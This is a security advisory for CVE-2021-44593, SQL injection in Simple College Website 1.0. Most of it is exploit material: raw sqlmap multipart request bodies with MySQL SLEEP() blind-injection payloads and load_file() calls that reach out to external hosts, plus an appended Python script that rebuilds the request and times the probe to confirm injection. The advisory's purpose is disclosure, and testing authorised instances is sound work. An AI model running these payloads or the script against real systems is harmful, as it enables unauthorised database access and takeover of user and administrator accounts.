CVE-2021-44593
Description:
Simple College Website 1.0 is vulnerable to multiple SQL injection flaws. The first stage is an authentication bypass; once past it, the attacker can exploit and manipulate every account in the system, including the administrator accounts.
The vulnerable parameters are contact, email, and id (all sent as multipart/form-data POST fields).
Status: CRITICAL
[+] Payloads:
---
Parameter: MULTIPART email ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="name"
Simple College Website
------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="email"
info@sample.comm' AND (SELECT 4393 FROM (SELECT(SLEEP(3)))fUEd) AND 'hsNN'='hsNN
------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="contact"
+6948 8542 623'+(select load_file('\\\\3rveh4nxo0txl4w4nvkmpgek6bc40w0krnff27qw.sourcecodester.com\\ghw'))+'
------WebKitFormBoundaryfYPr4nvTNDnB74wX
Content-Disposition: form-data; name="about"
<p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: ce
---
---
Parameter: MULTIPART id ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundaryQYuBFl6XnXBtfWL5
Content-Disposition: form-data; name="id"
(select load_file('\\\\187cy24v5yav22d24t1k6evin9t2hw5n7bzypme.sourcecodester.com\\gkl')) AND (SELECT 7782 FROM (SELECT(SLEEP(3)))jcgr)
------WebKitFormBoundaryQYuBFl6XnXBtfWL5
Content-Disposition: form-data; name="name"
iEIgvwLH
------WebKitFormBoundaryQYuBFl6XnXBtfWL5--
---
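The sqlmap output above is a raw multipart body, which is awkward to replay by hand. The script below is an added example (not part of this advisory and not code from the Simple College Website project) that rebuilds that request for the email parameter from the boundary and SLEEP() probe shown above, and decides from response timing whether the parameter behaves as time-based blind injectable. The endpoint path, the target URL and the timing tolerance are assumptions; the field names and payload string are taken from the advisory.

```python
"""Added example: reproduce the time-based blind probe reported for the `email` field.

Assumptions (not stated in the advisory): the form posts to /contact.php,
a 0.5 s tolerance is enough to separate a SLEEP(3) from network jitter.
"""
import time
import urllib.error
import urllib.request

# Boundary copied from the sqlmap output; the body lines are "--" + BOUNDARY.
BOUNDARY = "----WebKitFormBoundaryfYPr4nvTNDnB74wX"


def build_multipart(fields: dict, boundary: str = BOUNDARY) -> tuple[bytes, str]:
    """Encode fields as multipart/form-data. Returns (body, Content-Type value)."""
    parts = []
    for name, value in fields.items():
        parts.append(f"--{boundary}\r\n")
        parts.append(f'Content-Disposition: form-data; name="{name}"\r\n\r\n')
        parts.append(f"{value}\r\n")
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode("utf-8"), f"multipart/form-data; boundary={boundary}"


def sleep_payload(base: str, seconds: int, marker: str = "hsNN") -> str:
    """Wrap a legitimate value in the MySQL SLEEP() probe from the advisory.

    The closing `AND 'hsNN'='hsNN` re-balances the quote the payload opened,
    so the query stays syntactically valid and only the delay reveals injection.
    """
    return (f"{base}' AND (SELECT 4393 FROM (SELECT(SLEEP({seconds})))fUEd) "
            f"AND '{marker}'='{marker}")


def looks_injectable(baseline: float, delayed: float, seconds: int,
                     tolerance: float = 0.5) -> bool:
    """True when the probe added roughly `seconds` on top of the baseline time."""
    return (delayed - baseline) >= (seconds - tolerance)


def timed_post(url: str, fields: dict, timeout: float = 30.0) -> float:
    """POST the multipart body and return elapsed seconds (HTTP errors still count)."""
    body, ctype = build_multipart(fields)
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": ctype})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout):
            pass
    except urllib.error.HTTPError:
        pass  # a 4xx/5xx still executed the query; only timing matters here
    return time.monotonic() - start


def confirm_time_based(url: str, fields: dict, field: str, seconds: int = 3) -> bool:
    """Baseline request, then the same request with SLEEP(seconds) in `field`."""
    baseline = timed_post(url, fields)
    probe = dict(fields)
    probe[field] = sleep_payload(fields[field], seconds)
    delayed = timed_post(url, probe)
    return looks_injectable(baseline, delayed, seconds)


if __name__ == "__main__":
    # Hypothetical target; the form field values mirror the advisory's request.
    target = "http://127.0.0.1/college/contact.php"
    form = {"name": "Simple College Website", "email": "info@sample.comm",
            "contact": "+6948 8542 623", "about": "<p></p>"}
    print("email time-based blind:", confirm_time_based(target, form, "email"))
```

Run it only against an instance you are authorised to test; a single delayed response is weak evidence, so repeat with a different SLEEP value before reporting.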
